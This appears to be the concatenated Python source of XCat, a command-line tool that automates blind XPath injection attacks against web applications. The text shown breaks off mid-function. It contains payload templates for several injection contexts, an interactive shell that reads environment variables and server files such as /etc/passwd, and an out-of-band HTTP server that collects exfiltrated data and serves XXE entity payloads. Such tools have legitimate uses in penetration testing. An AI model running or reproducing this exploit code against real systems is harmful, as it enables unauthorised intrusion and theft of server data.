import asyncio
from typing import List

from xpath import E

from xcat.attack import AttackContext, Injection, check

injectors = [
    Injection('integer',
              "/lib/book[id=?]",
              (
                  ('{working} and 1=1', True),
                  ('{working} and 1=2', False)
              ),
              "{working} and {expression}"),
    Injection('string - single quote',
              "/lib/book[name='?']",
              (
                  ("{working}' and '1'='1", True),
                  ("{working}' and '1'='2", False),
              ),
              "{working}' and {expression} and '1'='1"),
    Injection('string - double quote',
              '/lib/book[name="?"]',
              (
                  ('{working}" and "1"="1', True),
                  ('{working}" and "1"="2', False),
              ),
              '{working}" and {expression} and "1"="1'),
    Injection('attribute name - prefix',
              "/lib/book[?=value]",
              (
                  ("1=1 and {working}", True),
                  ("1=2 and {working}", False)
              ),
              lambda working, expression: expression & E(working)),
    Injection('attribute name - postfix',
              "/lib/book[?=value]",
              (
                  ("{working} and not 1=2 and {working}", True),
                  ("{working} and 1=2 and {working}", False)
              ),
              lambda working, expression: working & expression & E(working)),
    Injection('element name - prefix',
              "/lib/something?/",
              (
                  (".[true()]/{working}", True),
                  (".[false()]/{working}", False)
              ),
              lambda working, expression: E('.')[expression].add_path('/' + working)),
    Injection('element name - postfix',
              "/lib/?something",
              (
                  ("{working}[true()]", True),
                  ("{working}[false()]", False)
              ),
              lambda working, expression: E(working)[expression]),
    Injection('function call - last string parameter - single quote',
              "/lib/something[function(?)]",
              (
                  ("{working}') and true() and string('1'='1", True),
                  ("{working}') and false() and string('1'='1", False),
              ),
              "{working}') and {expression} and string('1'='1"),
    Injection('function call - last string parameter - double quote',
              "/lib/something[function(?)]",
              (
                  ('{working}") and true() and string("1"="1', True),
                  ('{working}") and false() and string("1"="1', False),
              ),
              '{working}") and {expression} and string("1"="1'),
    Injection('other elements - last string parameter - double quote',
              "/lib/something[function(?) and false()] | //*[?]",
              (
                  ('{working}") and false()] | //*[true() and string("1"="1', True),
                  ('{working}") and false()] | //*[false() and string("1"="1', False),
              ),
              '{working}") and false()] | //*[{expression} and string("1"="1')

]


async def detect_injections(context: 'AttackContext') -> List[Injection]:
    working_value = context.target_parameter_value

    returner = []

    for injector in injectors:
        payloads = injector.test_payloads(working_value)
        result_futures = [
            check(context, test_payload)
            for test_payload, expected in payloads
        ]

        results = await asyncio.gather(*result_futures)

        if all(result == expected for result, (_, expected) in zip(results, payloads)):
            returner.append(injector)

    return returner



import enum
from collections import defaultdict, Counter
from typing import NamedTuple, Dict, Callable, Optional, Iterable, Tuple, Union, List

from contextlib import asynccontextmanager
from asyncio import BoundedSemaphore

from aiohttp import ClientSession, TCPConnector, web
from xcat.oob import create_app


class Encoding(enum.Enum):
    URL = 'url'
    FORM = 'form'


class Injection(NamedTuple):
    name: str
    example: str
    test_template_payloads: Iterable[Tuple[str, bool]]
    payload: Union[str, Callable[[str, str], str]]

    def __call__(self, working, expression) -> str:
        if callable(self.payload):
            return self.payload(working, expression)
        return self.payload.format(working=working, expression=expression)

    def test_payloads(self, working_value) -> List[Tuple[str, bool]]:
        return [
            (template.format(working=working_value), expected_result)
            for template, expected_result in self.test_template_payloads
        ]


class AttackContext(NamedTuple):
    url: str
    method: str
    target_parameter: str
    parameters: Dict[str, str]
    match_function: Callable[[int, str], bool]
    concurrency: int
    fast_mode: bool
    body: Optional[bytes]
    headers: Dict[str, str]
    encoding: Encoding
    oob_details: str

    session: ClientSession = None
    features: Dict[str, bool] = defaultdict(bool)
    common_strings = Counter()
    common_characters = Counter()
    injection: Injection = None
    # Limiting aiohttp concurrency at the TCPConnector level seems to not work
    # and leads to weird deadlocks. Use a semaphore here.
    semaphore: BoundedSemaphore = None
    oob_host: str = None
    oob_app: web.Application = None

    @asynccontextmanager
    async def start(self, injection: Injection = None) -> 'AttackContext':
        if self.session:
            raise RuntimeError('already has a session')

        semaphore = BoundedSemaphore(self.concurrency)
        connector = TCPConnector(ssl=False, limit=None)
        async with ClientSession(headers=self.headers, connector=connector) as sesh:
            yield self._replace(session=sesh, injection=injection, semaphore=semaphore)

    @asynccontextmanager
    async def start_oob_server(self) -> 'AttackContext':
        if self.oob_app:
            raise RuntimeError('OOB server has already been started')

        host, port = self.oob_details.split(':', 1)

        app = create_app()
        runner = web.AppRunner(app)
        await runner.setup()
        site = web.TCPSite(runner, '0.0.0.0', int(port))
        await site.start()

        new_ctx = self._replace(oob_host=f'http://{host}:{port}', oob_app=app)

        try:
            yield new_ctx
        finally:
            await runner.cleanup()

    @asynccontextmanager
    async def null_context(self) -> 'AttackContext':
        yield self

    @property
    def target_parameter_value(self):
        return self.parameters[self.target_parameter]


async def check(context: AttackContext, payload: str):
    if not context.session:
        raise ValueError('AttackContext has no session. Use start()')

    parameters = context.parameters.copy()
    if context.injection:
        payload = context.injection(context.target_parameter_value, payload)
    parameters[context.target_parameter] = str(payload)
    if context.encoding == Encoding.URL:
        args = {'params': parameters, 'data': context.body}
    else:
        args = {'data': parameters}

    async with context.semaphore:
        async with context.session.request(context.method, context.url, **args) as resp:
            body = await resp.text()
            return context.match_function(resp.status, body)



import asyncio
from typing import List, Dict, FrozenSet
import shlex

import click
import appdirs
from pathlib import Path
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.eventloop.defaults import use_asyncio_event_loop
from prompt_toolkit.styles import Style
from xpath import func, E

from . import algorithms, display, oob
from .attack import AttackContext, check


class BaseCommand:
    name: str
    alias: List[str] = []
    help_text: str
    args: List[str] = []
    required_features: FrozenSet[str] = frozenset()
    context: AttackContext

    def __init__(self, context: AttackContext):
        self.context = context

    def print_usage(self):
        args = ' '.join(f'[{a}]' for a in self.args)
        print(f'Usage: {self.name} {args}')

    async def run(self, args):
        raise NotImplementedError()

    def has_features(self, current_features: Dict[str, bool]):
        if not self.required_features:
            return True
        return any(current_features[f] for f in self.required_features)

    @classmethod
    def help_display(cls):
        if cls.args:
            args = ' '.join(f'[{a}]' for a in cls.args)
            return f'{args} - {cls.help_text}'
        return cls.help_text


class Env(BaseCommand):
    name = 'env'
    help_text = 'Read environment variables'
    required_features = {'environment-variables'}

    async def run(self, args):
        expr = func.available_environment_variables()
        total = await algorithms.count(self.context, expr)
        for name_expr in expr[:total + 1]:
            env_name = await algorithms.get_string(self.context, name_expr)
            print(f'{env_name}=', end='')
            value_expr = func.environment_variable(name_expr)
            env_value = await algorithms.get_string(self.context, value_expr)
            print(env_value)


class Pwd(BaseCommand):
    name = 'pwd'
    help_text = 'Get current working directory'
    required_features = {'document-uri', 'base-uri'}

    @staticmethod
    def cwd_expression(features):
        if features['base-uri']:
            return func.base_uri()
        else:
            return func.document_uri(E('/'))

    async def run(self, args):
        expr = self.cwd_expression(self.context.features)
        print(await algorithms.get_string(self.context, expr))


class Get(BaseCommand):
    name = 'get'
    help_text = 'Fetch a specific node by xpath expression'
    args = ['expression']

    async def run(self, args):
        expression = args[0]
        await display.display_xml(
            algorithms.get_nodes(self.context, E(expression))
        )


class GetString(BaseCommand):
    name = 'get-string'
    help_text = 'Fetch a specific string by xpath expression'
    args = ['expression']

    async def run(self, args):
        expression = args[0]
        print(algorithms.get_string(self.context, E(expression)))


class Time(BaseCommand):
    name = 'time'
    help_text = 'Get the current date+time of the server'
    required_features = {'current-datetime'}

    async def run(self, args):
        print(await algorithms.get_string(self.context,
                                          func.string(func.current_dateTime())))


class Cat(BaseCommand):
    name = 'cat'
    alias = ['ls']
    help_text = 'Read a file or directory'
    args = ['path']
    required_features = {'unparsed-text'}

    async def run(self, args):
        if not args:
            path = Pwd.cwd_expression(self.context.features)
        else:
            path = args[0]
        available = await check(self.context, func.unparsed_text_available(path))
        if not available:
            print(f'File {path} does not seem to be available')
            if input('Try anyway? [y/n]').lower() != 'y':
                return

        expr = func.unparsed_text_lines(path)
        length = await algorithms.count(self.context, expr)
        print(f'Lines: {length}')
        for line in algorithms.iterate_all(self.context, expr[:length + 1], disable_normalization=True):
            print(await line)


class ToggleFeature(BaseCommand):
    name = 'toggle'
    help_text = 'Toggle features on or off'

    async def run(self, args):
        if not args:
            print('Usage: toggle [feature name]')
            print('Available features and values:')
            for feature, enabled in self.context.features.items():
                click.echo(f'{feature} = ', nl=False)
                click.echo(
                    click.style(
                        'on' if enabled else 'off',
                        'bright_green' if enabled else 'red'
                    )
                )
        else:
            feature_name = args[0]
            current_value = self.context.features[feature_name]
            self.context.features[feature_name] = not current_value
            print(f'{feature_name} now {"on" if not current_value else "off"}')


class Resolve(BaseCommand):
    name = 'resolve'
    help_text = 'Resolve a file name to an absolute URI'
    args = ['path']

    async def run(self, args):
        if not args:
            return self.print_usage()
        path = args[0]
        expr = func.resolve_uri(path, func.document_uri(E('/')))
        print(await algorithms.get_string(self.context, expr))


class Find(BaseCommand):
    name = 'find'
    help_text = 'Find a file by name in parent directories'
    args = ['name']

    async def run(self, args):
        if not args:
            return self.print_usage()
        name = args[0]
        for i in range(10):
            rel_path = ('../' * i) + name
            print(f'Searching for {rel_path}')
            expr = func.resolve_uri(rel_path, func.document_uri(E('/')))
            if await check(self.context, func.doc_available(expr)):
                click.echo(click.style(f'XML file {rel_path} available', 'bright_green'))
            elif await check(self.context, func.unparsed_text_available(expr)):
                click.echo(click.style(f'Text file {rel_path} available', 'bright_green'))


class OOBExpectData(BaseCommand):
    name = 'expect-data'
    help_text = 'Add an entry to the OOB server to expect some data'

    async def run(self, args):
        if not self.context.oob_app:
            print('Error: OOB server is not enabled')
            return
        identifier, _ = oob.expect_data(self.context.oob_app)
        print(f'Identifier created: {identifier}')
        print(f'Hitting {self.context.oob_host}/data/{identifier}?d=[DATA] will save this data')
        print(f'Use {GetOOBData.name} {identifier} to retrieve it')


class OOBExpectEntity(BaseCommand):
    name = 'expect-entity-injection'
    help_text = 'Add an entry to the OOB server to expect a SYSTEM entity injection'
    args = ['file_path']

    async def run(self, args):
        if not args:
            return self.print_usage()
        if not self.context.oob_app:
            print('Error: OOB server is not enabled')
            return
        file_path = args[0]
        identifier, _ = oob.expect_entity_injection(self.context.oob_app, f'SYSTEM "{file_path}"')
        print(f'Identifier created: {identifier}')
        print(f'Hitting {self.context.oob_host}/entity/{identifier} will server a XXE page')
        print(f'Hitting {self.context.oob_host}/data/{identifier}?d=[DATA] will save the data')
        print(f'Use {GetOOBData.name} {identifier} to retrieve it')


class GetOOBData(BaseCommand):
    name = 'get-oob-data'
    help_text = 'Get OOB data from an identifier'
    args = ['identifier']

    async def run(self, args):
        if not args:
            return self.print_usage()
        if not self.context.oob_app:
            print('Error: OOB server is not enabled')
            return
        identifier = args[0]
        if identifier not in self.context.oob_app['expectations']:
            print(f'Error: {identifier} not found. Did you register it with {OOBExpectData.name}?')
            return
        # Bit hacky
        future: asyncio.Future = self.context.oob_app['expectations'][identifier]
        if not future.done():
            print(f'Error: {identifier} has received no data yet.')
        else:
            print(f'Data received for {identifier}:')
            print(future.result())


class Exit(BaseCommand):
    name = 'exit'
    help_text = 'Quit the shell'

    async def run(self, args):
        exit(0)


class Help(BaseCommand):
    name = 'help'
    help_text = 'Get help'

    async def run(self, args):
        print('Available commands:')
        for command in BaseCommand.__subclasses__():
            click.echo(click.style(command.name, 'bright_green'), nl=False)
            print(f': {command.help_display()}')


async def shell_loop(context: AttackContext):
    use_asyncio_event_loop()
    history_dir = Path(appdirs.user_data_dir('python-xcat'))
    if not history_dir.exists():
        history_dir.mkdir(parents=True)
    history = FileHistory(history_dir / 'history')
    session = PromptSession(history=history)

    commands: Dict[str, BaseCommand] = {
        c.name: c(context)
        for c in BaseCommand.__subclasses__()
    }

    for c in BaseCommand.__subclasses__():
        for alias in c.alias:
            commands[alias] = commands[c.name]
    completer = WordCompleter(
        commands.keys(),
        meta_dict={
            name: command.help_display()
            for name, command in commands.items()
        }
    )
    style = Style.from_dict({
        'prompt': '#884444',
        'dollar': '#00aa00'
    })

    while True:
        user_input = await session.prompt(
            [
                ('class:prompt', 'XCat'),
                ('class:dollar', '$ ')
            ],
            style=style,
            async_=True,
            completer=completer,
            auto_suggest=AutoSuggestFromHistory()
        )

        split_input = shlex.split(user_input)
        if not split_input:
            continue

        name, args = split_input[0], split_input[1:]

        if name not in commands:
            print(f'Unknown command {name}. Use "help" to get help')
            continue

        command = commands[name]

        if not command.has_features(context.features):
            print(click.style('Error: ', 'red'), end='')
            print(f'Cannot use {name} as not all features are '
                  f'present in this injection')
            if command.required_features:
                print('Required features: ', end='')
                print(click.style(', '.join(command.required_features), 'red'))
                print('Use toggle_feature to force these on')
        else:
            await command.run(args)



import asyncio
import random
from typing import Tuple
from urllib import parse

from aiohttp import web

ENTITY_INJECTION_TEMPLATE = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>' \
                            '<!DOCTYPE stuff [<!ELEMENT data ANY> <!ENTITY goodies {0}>]> <data>&goodies;</data>'

router = web.RouteTableDef()


@router.get('/test/data')
async def test_handler(request: web.Request):
    return web.Response(body=f"<data>{request.app['test_response_value']}</data>", content_type='text/xml')


@router.get('/test/entity')
async def test_entity_handler(request: web.Request):
    return web.Response(body=ENTITY_INJECTION_TEMPLATE.format(f'"{request.app["test_response_value"]}"'),
                        content_type='text/xml')


@router.get('/entity/{id}')
async def entity_handler(request: web.Request):
    file_id = request.match_info["id"]
    if file_id not in request.app['expectations']:
        return web.Response(status=404)

    value = request.app['entity_values'][file_id]
    return web.Response(body=ENTITY_INJECTION_TEMPLATE.format(value), content_type='text/xml')


@router.get('/data/{id}')
async def data_handler(request: web.Request):
    expect_id = request.match_info['id']
    if expect_id not in request.app['expectations']:
        return web.Response(status=404)

    data = parse.unquote(request.rel_url.query_string[2:])
    future: asyncio.Future = request.app['expectations'][expect_id]
    if future.done():
        return web.Response(body=f'Error: {expect_id} used twice', status=400)
    future.set_result(data)
    return web.Response(body=f"<data>{request.app['test_response_value']}</data>", content_type='text/xml')


def create_app():
    app = web.Application(client_max_size=1024 * 1024 * 1024)
    app.router.add_routes(router)
    app['test_response_value'] = random.randint(1, 1000000)
    app['expectations'] = {}
    app['entity_values'] = {}
    return app


def expect_data(app: web.Application) -> Tuple[str, asyncio.Future]:
    expectations = app['expectations']
    identifier = str(len(expectations))
    future = asyncio.Future()
    expectations[identifier] = future
    return identifier, future


def expect_entity_injection(app: web.Application, entity_value):
    identifier, future = expect_data(app)
    app['entity_values'][identifier] = entity_value
    return identifier, future



import re
import urllib.request
from typing import Callable, Tuple

import click

from .features import features


def get_ip():
    with urllib.request.urlopen('https://api.ipify.org') as content:
        return re.search(r'[0-9]+(?:\.[0-9]+){3}', str(content.read())).group(0)


class FeatureChoice(click.types.StringParamType):
    def convert(self, value, param, ctx):
        value = super().convert(value, param, ctx)
        feature_names = {feature.name for feature in features}
        given_names = set(value.split(','))
        unknown_features = given_names - feature_names
        if unknown_features:
            self.fail(f'Unknown features: {", ".join(unknown_features)}.')
        return given_names


class EnumType(click.Choice):
    def __init__(self, enum):
        self._enum = enum
        super().__init__(enum.__members__)

    def convert(self, value, param, ctx):
        if isinstance(value, self._enum):
            return value
        value = value.upper()
        return self._enum[super().convert(value, param, ctx)]


class HeaderFile(click.File):
    def __init__(self):
        super().__init__(mode='r')

    def convert(self, value, param, ctx):
        open_file = super().convert(value, param, ctx)

        # ToDO: replace this with the new aiohttp header parser
        #  https://github.com/aio-libs/aiohttp/blob/15857de31e57574be595ac3fda673852eef64b63/aiohttp/http_parser.py#L76

        with open_file as fd:
            lines = (line.strip() for line in open_file)
            headers = {}
            for line in lines:
                if not line:
                    continue
                try:
                    key, value = line.split(':', 1)
                except ValueError:
                    self.fail(f'Not a valid header line: {line}')

                headers[key] = value.strip()

            return headers


class DictParameters(click.ParamType):
    def convert(self, value, param, ctx):
        try:
            key, value = value.split('=', 1)
        except ValueError:
            self.fail(f'Argument "{value}" must be in a key=value format')

        return key, value


class Negatable(click.ParamType):
    def convert(self, value, param, ctx):
        negate = False
        if value.startswith('!'):
            negate = True
            value = value[1:]

        return negate, self.validate(value)

    def validate(self, value):
        raise NotImplementedError()


class NegatableInt(Negatable):
    name = 'str'

    def validate(self, value):
        try:
            return int(value)
        except ValueError:
            self.fail(f'{value} is not an integer.')


class NegatableString(Negatable):
    name = 'str'

    def validate(self, value):
        return value


def make_match_function(true_code: Tuple[bool, int], true_string: Tuple[bool, str]) -> Callable[[int, str], bool]:
    def check_code(response_code: int):
        if true_code is None:
            return True

        negate_code, expected_code = true_code
        if negate_code:
            return response_code != expected_code

        return response_code == expected_code

    def check_content(content: str):
        if true_string is None:
            return True

        negate_string, expected_string = true_string
        if negate_string:
            return expected_string not in content

        return expected_string in content

    return lambda code, content: check_code(code) and check_content(content)



import asyncio
import contextlib
import sys
from collections import namedtuple
from xml.sax.saxutils import XMLGenerator, escape

XMLNode = namedtuple('XMLNode', 'name attributes text comments')


async def display_xml(nodes, display=None):
    if display is None:
        display = XMLOutput()

    if asyncio.iscoroutine(nodes):
        nodes = [await nodes]

    for (node, children) in nodes:
        display.output_start_node(node)

        results = await asyncio.gather(*children)

        for result in results:
            await display_xml([result], display)

        display.output_end_node(node)


class XMLOutput:
    def __init__(self, fd=None, include_start=True):
        self.output = fd or sys.stdout
        self.include_start = include_start
        self.writer = XMLGeneratorWithComments(self.output, "utf-8")

    def flush(self):
        self.output.flush()

    def output_started(self):
        if self.include_start:
            self.writer.startDocument()
        self.flush()

    def output_start_node(self, node):
        self.writer.startElement(node.name, node.attributes)

        for comment in node.comments:
            self.writer.writeComment(comment)

        if node.text:
            self.writer.characters(node.text)
        self.flush()

    def output_end_node(self, node):
        self.writer.endElement(node.name)
        self.flush()

    def output_finished(self):
        self.writer.endDocument()
        self.flush()


class XMLGeneratorWithComments(XMLGenerator):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.tabs = 0

    @contextlib.contextmanager
    def indent(self, extra_tabs=0):
        self._write("\t" * (self.tabs + extra_tabs))
        yield
        self._write("\n")

    def writeComment(self, comment):
        with self.indent():
            self._write(f"<!--{escape(comment)}-->")

    def characters(self, content):
        with self.indent():
            super().characters(content)

    def startElement(self, name, attrs):
        with self.indent():
            super().startElement(name, attrs)
        self.tabs += 1

    def endElement(self, name):
        self.tabs -= 1
        with self.indent():
            super().endElement(name)



"""
XCat.

Usage:
    xcat <url> <target_parameter> [<parameters>]... (--true-string=<string> | --true-code=<code>) [--method=<method>]
         [--fast] [--oob-ip=<ip> (--oob-port=<port>)] [--stats] [--concurrency=<val>]
         [--features] [--body] [--cookie=<cookie>] [(--shell | --shellcmd=<cmd>)]
    xcat detectip

Options:
    -o, --oob-ip=<ip>           Use this IP for OOB injection attacks
    -p, --oob-port=<port>       Use this port for injection attacks
    --stats                     Print statistics at the end of the session
"""
import contextlib
import functools
from typing import List, Tuple
import asyncio

import click

from xcat import algorithms, utils
from xcat.attack import AttackContext, Encoding
from xcat.display import display_xml
from xcat.features import detect_features, Feature
from xcat.injections import detect_injections, Injection, injectors
from xcat.shell import shell_loop


@click.group()
def cli():
    pass


def attack_options(func):
    @cli.command()
    @click.option('-m', '--method', default='GET', show_default=True, help='HTTP method to use')
    @click.option('-h', '--headers', required=False, type=utils.HeaderFile(),
                  help='A file containing extra headers')
    @click.option('-b', '--body', required=False, type=click.File('rb'),
                  help='A file containing data to send in the request body')
    @click.option('-e', '--encode', default=Encoding.URL, type=utils.EnumType(Encoding),
                  help='Where to send the parameters (POST body or in the URL)')
    @click.option('-f', '--fast', is_flag=True, type=bool, default=False, show_default=True,
                  help='If given only retrieve the first 15 characters of strings. Can speed up retrieval.')
    @click.option('-c', '--concurrency', type=int, default=10, show_default=True,
                  help='Number of concurrent requests to make')
    @click.option('-ts', '--true-string', required=False, type=utils.NegatableString(),
                  help="Interpret this string in the response body as being a truthful request. Negate with '!'")
    @click.option('-tc', '--true-code', required=False, type=utils.NegatableInt(),
                  help="Interpret this response code as being a truthful request. Negate with '!'")
    @click.option('--enable', required=False, type=utils.FeatureChoice(),
                  help='Force enable features')
    @click.option('--disable', required=False, type=utils.FeatureChoice(),
                  help='Force disable features')
    @click.option('--oob', required=False,
                  help='IP:port to listen on for OOB attacks. This enables the OOB server.')
    @click.argument('url')
    @click.argument('target_parameter')
    @click.argument('parameters', nargs=-1, type=utils.DictParameters())
    @click.pass_context
    @functools.wraps(func)
    def wrapper(ctx, url, target_parameter, parameters, concurrency, fast, body, headers, method,
                encode, true_string, true_code, enable, disable, oob, **kwargs):
        if body and encode != 'url':
            ctx.fail('Can only use --body with url encoding')

        if not true_code and not true_string:
            ctx.fail('--true-code or --true-string is required')

        match_function = utils.make_match_function(true_code, true_string)
        parameters = dict(parameters)

        if target_parameter not in parameters:
            ctx.fail(f'target parameter {target_parameter} is not in the given list of parameters')

        body_bytes = None
        if body:
            body_bytes = body.read()

        context = AttackContext(
            url=url,
            method=method,
            target_parameter=target_parameter,
            parameters=parameters,
            match_function=match_function,
            concurrency=concurrency,
            fast_mode=fast,
            body=body_bytes,
            headers=headers,
            encoding=encode,
            oob_details=oob
        )

        if enable:
            context.features.update({k: True for k in enable})

        if disable:
            context.features.update({k: False for k in disable})

        return func(context, **kwargs)

    return wrapper


@attack_options
def detect(attack_context):
    payloads: List[Injection] = asyncio.run(get_injections(attack_context))

    if not payloads:
        click.echo(click.style('Error: No injections detected', 'red'), err=True)
        exit(1)

    for payload in payloads:
        click.echo(click.style(payload.name, 'green'))
        click.echo('Example: ' + click.style(payload.example, 'yellow'))
    click.echo()

    features: List[Tuple[Feature, bool]] = asyncio.run(get_features(attack_context, payloads[0]))
    click.echo('Detected features:')
    for feature, available in features:
        click.echo(click.style(feature.name, 'blue') + ': ', nl=False)
        click.echo(click.style(str(available), 'green' if available else 'red'))


@attack_options
def run(attack_context):
    asyncio.run(start_attack(attack_context))


@attack_options
def shell(attack_context):
    asyncio.run(start_shell(attack_context))


@cli.command()
def ip():
    ip = utils.get_ip()
    if not ip:
        click.echo('Could not find an external IP', err=True)
    else:
        click.echo(ip)
    return


@cli.command()
def injections():
    click.echo(f'Supports {len(injectors)} injections:')
    for injector in injectors:
        click.echo('Name: ' + click.style(injector.name, 'bright_green'))
        formatted_example = injector.example.replace('?', click.style('?', 'red'))
        click.echo(' Example: ' + formatted_example)
        click.echo(' Tests:')
        for payload, expected in injector.test_payloads(click.style('?', 'red')):
            res = click.style('passes' if expected else 'fails', 'green' if expected else 'red')
            click.echo(f'   {payload} = {res}')


async def get_injections(context: AttackContext):
    async with context.start() as ctx:
        return await detect_injections(ctx)


async def get_features(context: AttackContext, injection: Injection):
    async with context.start() as ctx:
        return await detect_features(ctx, injection)


@contextlib.asynccontextmanager
async def setup_context(context: AttackContext) -> AttackContext:
    detected_injections = await get_injections(context)
    if not detected_injections:
        click.echo(click.style('Error: No injections detected', 'red'), err=True)
        exit(1)
    features = await get_features(context, detected_injections[0])
    for feature, available in features:
        if feature.name in context.features:
            # This will have been force enable or disabled via the CLI flags
            continue
        context.features[feature.name] = available
    async with context.start(detected_injections[0]) as ctx:
        if context.features['oob-http']:
            oob_ctx_manager = ctx.start_oob_server
        else:
            oob_ctx_manager = ctx.null_context
        async with oob_ctx_manager() as oob_ctx:
            yield oob_ctx


async def start_attack(context: AttackContext):
    async with setup_context(context) as ctx:
        await display_xml([await algorithms.get_nodes(ctx)])


async def start_shell(context: AttackContext):
    async with setup_context(context) as ctx:
        await shell_loop(ctx)


if __name__ == '__main__':
    cli()



import os

from setuptools import setup

readme = ""
if os.path.exists("README.md"):
    with open("README.md") as f:
        readme = f.read()

setup(name="xcat",
      version="1.0.3",
      author="Tom Forbes",
      license="MIT",
      author_email="tom@tomforb.es",
      package_dir={'xcat': 'xcat'},
      packages=['xcat'],
      install_requires=[
          'xpath-expressions~=1.0',
          'aiohttp~=3.0',
          'aiodns',
          'cchardet',
          'colorama',
          'prompt_toolkit<3',
          'click',
          'appdirs',
      ],
      python_requires='>=3.7',
      entry_points={
          'console_scripts': [
              'xcat = xcat.cli:cli',
          ]
      },
      description="A command line tool to automate the exploitation of blind XPath injection vulnerabilities",
      long_description=readme,
      long_description_content_type='text/markdown',
      url="https://github.com/orf/xcat",
      classifiers=[
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.5',
          'Programming Language :: Python :: 3.6',
          'License :: OSI Approved :: MIT License',
      ])



import asyncio
from typing import List, NamedTuple, Callable, Union

from xpath import E, Expression, func, Functions

from .attack import AttackContext, check
from .injections import Injection
from .algorithms import ASCII_SEARCH_SPACE

fs_func = Functions('Q{http://expath.org/ns/file}')
saxon_func = Functions('saxon:')


class Feature(NamedTuple):
    name: str
    tests: List[Union[Expression, Callable]]


def test_oob(path):
    async def test_oob_inner(context: AttackContext, injector: Injection):
        if not context.oob_details:
            return False

        async with context.start_oob_server() as ctx:
            doc_expr = func.doc(f'{ctx.oob_host}{path}').add_path('/data') == ctx.oob_app['test_response_value']
            return await check(
                context,
                injector(context.target_parameter_value, doc_expr)
            )

    return test_oob_inner


features = [
    Feature('xpath-2',
            [
                func.lower_case('A') == 'a',
                func.ends_with('thetest', 'test'),
                func.encode_for_uri('test') == 'test'
            ]),
    Feature('xpath-3',
            [
                func.boolean(func.generate_id(E('/')))
            ]),
    Feature('xpath-3.1',
            [
                func.contains_token('a', 'a')
            ]),
    Feature('normalize-space',
            [
                func.normalize_space('  a  b ') == 'a b'
            ]),
    Feature('substring-search',
            [
                func.string_length(func.substring_before(ASCII_SEARCH_SPACE, 'h')) == ASCII_SEARCH_SPACE.find('h'),
                func.string_length(func.substring_before(ASCII_SEARCH_SPACE, 'o')) == ASCII_SEARCH_SPACE.find('o')
            ]),
    Feature('codepoint-search',
            [
                func.string_to_codepoints("test")[1] == 116
            ]),
    Feature('environment-variables',
            [
                func.exists(func.available_environment_variables())
            ]),
    Feature('document-uri',
            [
                func.document_uri(E('/'))
            ]),
    Feature('base-uri',
            [
                func.base_uri()
            ]),
    Feature('current-datetime',
            [
                func.string(func.current_dateTime())
            ]),
    Feature('unparsed-text',
            [
                func.unparsed_text_available(func.document_uri(E('/')))
            ]),
    Feature('doc-function',
            [
                func.doc_available(func.document_uri(E('/')))
            ]),
    Feature('linux',
            [
                func.unparsed_text_available('/etc/passwd')
            ]),
    Feature('expath-file',
            [
                func.string_length(fs_func.current_dir()) > 0
            ]),
    Feature('saxon',
            [
                saxon_func.evaluate('1+1') == 2
            ]),
    Feature('oob-http', [test_oob('/test/data')]),
    Feature('oob-entity-injection', [test_oob('/test/entity')])
]


async def detect_features(context: AttackContext, injector: Injection) -> List[Feature]:
    returner = []

    for feature in features:
        futures = [
            check(context, injector(context.target_parameter_value, test))
            if not callable(test)
            else test(context, injector)
            for test in feature.tests
        ]
        checks = await asyncio.gather(*futures)

        returner.append((feature, all(checks)))

    return returner



import asyncio
import string as stdlib_string

from xpath import ROOT_NODE, func, Functions

from . import oob
from .attack import AttackContext, check
from .display import XMLNode

fs_func = Functions('Q{http://expath.org/ns/file}')

ASCII_SEARCH_SPACE = stdlib_string.digits + stdlib_string.ascii_letters + '+./:@_ -,()!'
MISSING_CHARACTER = "?"


async def count(context: AttackContext, expression, count_func=func.count):
    if context.features['oob-http']:
        result = await get_string_via_oob(context, func.string(count_func(expression)))
        if result is not None and result.isdigit():
            return int(result)

    return await binary_search(context, count_func(expression), min=0)


async def get_char(context: AttackContext, expression):
    if context.features['codepoint-search']:
        return await codepoint_search(context, expression)
    elif context.features['substring-search']:
        return await substring_search(context, expression)
    else:
        # Dumb search
        top_characters = "".join(c[0] for c in context.common_characters.most_common())
        search_space = top_characters + "".join(c for c in ASCII_SEARCH_SPACE if c not in top_characters)

        for space in search_space:
            if await check(context, expression == space):
                context.common_characters[space] += 1
                return space


async def get_common_string(context: AttackContext, expression, length):
    if length >= 10:
        return

    common_names = [item[0] for item in context.common_strings.most_common()
                    if len(item[0]) == length][:5]
    if common_names:
        futures = [check(context, expression == common_name) for common_name in common_names]
        results = zip(await asyncio.gather(*futures), common_names)

        for result, name in results:
            if result:
                context.common_strings[name] += 1
                return name


async def get_string(context: AttackContext, expression, disable_normalization=False):
    if context.features['normalize-space'] and not disable_normalization:
        expression = func.normalize_space(expression)

    if context.features['oob-http']:
        result = await get_string_via_oob(context, expression)
        if result is not None:
            return result
        else:
            pass

    total_string_length = await count(context, expression, count_func=func.string_length)

    if total_string_length <= 0:
        return ""

    # Try common strings we've got before
    result = await get_common_string(context, expression, total_string_length)
    if result is not None:
        return result

    fetch_length = total_string_length if not context.fast_mode else min(15, total_string_length)

    chars_futures = [
        get_char(context, func.substring(expression, i, 1))
        for i in range(1, fetch_length + 1)
    ]

    chars = await asyncio.gather(*chars_futures)

    result = "".join(
        char if char is not None else MISSING_CHARACTER
        for char in chars
    )

    if context.fast_mode and fetch_length != total_string_length:
        difference = total_string_length - fetch_length
        return f'{result}... ({difference} more characters)'
    else:
        if len(result) <= 10:
            context.common_strings[result] += 1
    return result


async def get_string_via_oob(context: AttackContext, expression):
    identifier, future = oob.expect_data(context.oob_app)
    url = f'{context.oob_host}/data/{identifier}?d='
    url_expr = func.concat(url, func.encode_for_uri(expression))
    oob_expr = func.doc(url_expr) / 'data' == context.oob_app['test_response_value']
    if not await check(context, oob_expr):
        await asyncio.sleep(10000)
        return None

    try:
        return await asyncio.wait_for(future, timeout=3)
    except asyncio.TimeoutError:
        return None


async def doc_available(context: AttackContext, path):
    return await check(context, func.doc_available(path))


async def get_file_via_entity_injection(context: AttackContext, file_path):
    identifier, future = oob.expect_entity_injection(context.oob_app, f'SYSTEM "{file_path}"')
    url = f'{context.oob_host}/entity/{identifier}'
    return await get_string_via_oob(context, func.doc(url) / 'data')


def iterate_all(context: AttackContext, expressions, **kwargs):
    for text in expressions:
        yield get_string(context, text, **kwargs)


async def get_all_text(context: AttackContext, expression):
